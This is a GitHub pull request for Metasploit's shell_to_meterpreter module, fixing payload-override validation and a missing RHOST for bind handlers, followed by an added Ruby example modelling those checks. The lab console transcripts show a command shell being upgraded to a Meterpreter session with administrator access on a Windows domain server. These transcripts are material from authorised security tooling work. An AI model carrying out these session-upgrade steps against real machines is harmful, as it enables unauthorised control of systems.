
shell_to_meterpreter: Support using bind payloads with PAYLOAD_OVERRIDE #17917

Merged
merged 1 commit into from
Jun 5, 2023

Conversation

bcoles (Contributor) commented Apr 22, 2023

Fixes #17885
Fixes #17916

Before

[*] Command shell session 1 opened (192.168.200.130:1338 -> 192.168.200.190:50071) at 2023-04-22 01:45:31 -0400
msf6 > 
msf6 > use post/multi/manage/shell_to_meterpreter
msf6 post(multi/manage/shell_to_meterpreter) > set session 1
session => 1
msf6 post(multi/manage/shell_to_meterpreter) > set payload_override windows/x64/meterpreter/bind_tcp
payload_override => windows/x64/meterpreter/bind_tcp
msf6 post(multi/manage/shell_to_meterpreter) > run

[*] Upgrading session ID: 1
[*] Starting exploit/multi/handler
[*] Started bind TCP handler against :4433
[*] Post module execution completed
msf6 post(multi/manage/shell_to_meterpreter) > 

After

msf6 > 
[*] Sending stage (336 bytes) to 192.168.200.190
[*] Command shell session 1 opened (192.168.200.130:1338 -> 192.168.200.190:50070) at 2023-04-22 01:42:49 -0400

msf6 > 
msf6 > 
msf6 > use post/multi/manage/shell_to_meterpreter
msf6 post(multi/manage/shell_to_meterpreter) > set session 1
session => 1
msf6 post(multi/manage/shell_to_meterpreter) > set payload_override windows/x64/meterpreter/bind_tcp
payload_override => windows/x64/meterpreter/bind_tcp
msf6 post(multi/manage/shell_to_meterpreter) > run

[*] Upgrading session ID: 1
[*] Starting exploit/multi/handler
[*] Started bind TCP handler against 192.168.200.190:4433
[*] Post module execution completed
msf6 post(multi/manage/shell_to_meterpreter) > 
[*] Sending stage (200774 bytes) to 192.168.200.190
[*] Meterpreter session 2 opened (192.168.200.130:33359 -> 192.168.200.190:4433) at 2023-04-22 01:43:14 -0400
[*] Stopping exploit/multi/handler

msf6 post(multi/manage/shell_to_meterpreter) > sessions -i 2
[*] Starting interaction with 2...

meterpreter > getuid
Server username: TEST\user
smeterpreter > sysinfo
Computer        : TEST
OS              : Windows 7 (6.1 Build 7601, Service Pack 1).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 1
Meterpreter     : x64/windows
meterpreter > 

Yes, I'm sure these changes also work on Windows 10 and Windows 11 (firewall rules and network routes permitting of course). No I didn't test. No I don't care.

Note: This PR does what it says on the tin. It does not fix the other 500 bugs in shell_to_meterpreter as these bugs are due to fundamental flaws which require the majority of the module to be rewritten.

bcoles (Contributor, Author) commented Apr 22, 2023

The appropriate rhost is detected and set automatically through Metasploit magic. Operators can manually select a rhost with set rhost <rhost> if they choose. Metasploit currently prevents manually setting an rhost (pending merge of #17911), but this is not a blocker for this PR.

@gwillcox-r7 gwillcox-r7 added the rn-fix release notes fix label Jun 5, 2023
gwillcox-r7 (Contributor)

Confirmed #17916 is fixed:

msf6 payload(windows/x64/shell_bind_tcp) > 
[*] Started bind TCP handler against 192.168.64.138:4444
[*] Command shell session 1 opened (192.168.64.128:41021 -> 192.168.64.138:4444) at 2023-06-05 13:30:53 -0500

msf6 payload(windows/x64/shell_bind_tcp) > use post/multi/manage/shell_to_meterpreter 
msf6 post(multi/manage/shell_to_meterpreter) > set SESSION 1
SESSION => 1
msf6 post(multi/manage/shell_to_meterpreter) > set PAYLOAD_OVERRIDE windows/asdf
PAYLOAD_OVERRIDE => windows/asdf
msf6 post(multi/manage/shell_to_meterpreter) > run

[*] Upgrading session ID: 1
[-] Could not generate payload windows/asdf. Invalid payload?
[-] Unable to build a suitable payload for windows using payload windows/asdf.
[*] Post module execution completed
msf6 post(multi/manage/shell_to_meterpreter) > 

gwillcox-r7 (Contributor)

And the other bug in #17885 is now fixed:

msf6 payload(windows/x64/shell_bind_tcp) > use post/multi/manage/shell_to_meterpreter 
msf6 post(multi/manage/shell_to_meterpreter) > set SESSION 1
SESSION => 1
msf6 post(multi/manage/shell_to_meterpreter) > set PAYLOAD_OVERRIDE windows/asdf
PAYLOAD_OVERRIDE => windows/asdf
msf6 post(multi/manage/shell_to_meterpreter) > run

[*] Upgrading session ID: 1
[-] Could not generate payload windows/asdf. Invalid payload?
[-] Unable to build a suitable payload for windows using payload windows/asdf.
[*] Post module execution completed
msf6 post(multi/manage/shell_to_meterpreter) > set PAYLOAD_OVERRIDE windows/x64/meterpreter/bind_tcp
PAYLOAD_OVERRIDE => windows/x64/meterpreter/bind_tcp
msf6 post(multi/manage/shell_to_meterpreter) > run

[*] Upgrading session ID: 1
[*] Starting exploit/multi/handler
[*] Started bind TCP handler against 192.168.64.138:4433
[*] Sending stage (200774 bytes) to 192.168.64.138
[*] Meterpreter session 2 opened (192.168.64.128:35057 -> 192.168.64.138:4433) at 2023-06-05 13:33:45 -0500
[-] Failed to start exploit/multi/handler on 4433, it may be in use by another process.
[*] Post module execution completed
msf6 post(multi/manage/shell_to_meterpreter) > jobs -K
Stopping all jobs...
msf6 post(multi/manage/shell_to_meterpreter) > exploit

[*] Upgrading session ID: 1
[*] Starting exploit/multi/handler
[*] Started bind TCP handler against 192.168.64.138:4433
[*] Post module execution completed
msf6 post(multi/manage/shell_to_meterpreter) > 
[*] Sending stage (200774 bytes) to 192.168.64.138
[*] Meterpreter session 3 opened (192.168.64.128:33563 -> 192.168.64.138:4433) at 2023-06-05 13:34:09 -0500
[*] Stopping exploit/multi/handler

msf6 post(multi/manage/shell_to_meterpreter) > sessions -i 3
[*] Starting interaction with 3...

meterpreter > getuid
Server username: DAFOREST\Administrator
meterpreter > sysinfo
Computer        : WIN-E72FSF87GO1
OS              : Windows 2016+ (10.0 Build 20348).
Architecture    : x64
System Language : en_US
Domain          : DAFOREST
Logged On Users : 8
Meterpreter     : x64/windows
meterpreter > 

@gwillcox-r7 gwillcox-r7 merged commit 0d094f8 into rapid7:master Jun 5, 2023
gwillcox-r7 (Contributor)

Release Notes

Two bugs have been fixed in post/multi/manage/shell_to_meterpreter: one was caused by a lack of validation on the payload being used when using the PAYLOAD_OVERRIDE option to ensure the payload was valid, and one was caused by the module creating a handler but failing to pass the RHOST information along, causing the handler to run with an invalid configuration.

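The two fixes summarized in the release notes above (reject an unknown PAYLOAD_OVERRIDE before doing any work, and never start a bind handler without an RHOST), modelled in plain Ruby as an added example. This is not the module's or the framework's own code: the KNOWN_PAYLOADS registry, the session hash with peer_host and local_host, and the handler_options function are constructed stand-ins for the framework's payload list, session object and handler datastore.

```ruby
# Added example: a simplified model of the two checks described in the PR.
# Everything here is constructed for illustration and is not Metasploit's API.

# Constructed registry standing in for the framework's list of known payloads.
KNOWN_PAYLOADS = {
  'windows/x64/meterpreter/reverse_tcp' => { platform: 'windows', type: :reverse },
  'windows/x64/meterpreter/bind_tcp'    => { platform: 'windows', type: :bind },
  'linux/x64/meterpreter/reverse_tcp'   => { platform: 'linux',   type: :reverse }
}.freeze

class PayloadError < StandardError; end

# Bug 1: PAYLOAD_OVERRIDE was used without validation. Fail closed on names
# that are unknown or do not match the session's platform, before any
# payload is generated or handler started.
def validate_override(name, session_platform)
  info = KNOWN_PAYLOADS[name]
  raise PayloadError, "Could not generate payload #{name}. Invalid payload?" if info.nil?
  unless info[:platform] == session_platform
    raise PayloadError,
          "Unable to build a suitable payload for #{session_platform} using payload #{name}."
  end
  info
end

# Bug 2: the handler was created without RHOST, so a bind handler listened
# "against :4433" with nothing to connect to. Build the handler configuration
# and require a peer address whenever the payload is a bind payload.
# session is a constructed hash: { platform:, peer_host:, local_host: }.
# rhost_override models an operator's manual `set rhost <rhost>`.
def handler_options(name, session, lport: 4433, rhost_override: nil)
  info = validate_override(name, session[:platform])
  opts = { 'PAYLOAD' => name, 'LPORT' => lport }
  if info[:type] == :bind
    rhost = rhost_override || session[:peer_host]
    if rhost.nil? || rhost.empty?
      raise PayloadError, 'Bind payload selected but no RHOST is known for the session.'
    end
    opts['RHOST'] = rhost
  else
    opts['LHOST'] = session[:local_host]
  end
  opts
end

if __FILE__ == $PROGRAM_NAME
  # Constructed session record mirroring the addresses in the PR transcript.
  session = { platform: 'windows', peer_host: '192.168.200.190', local_host: '192.168.200.130' }
  p handler_options('windows/x64/meterpreter/bind_tcp', session)
  begin
    handler_options('windows/asdf', session)
  rescue PayloadError => e
    puts "[-] #{e.message}"
  end
end
```

The order matters: validation runs first, so an invalid override produces the "Invalid payload?" error and no handler job is ever created, which is the behaviour confirmed in the transcripts above.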
@bcoles bcoles deleted the shell_to_meterpreter branch June 6, 2023 03:28
Labels
bug module rn-fix release notes fix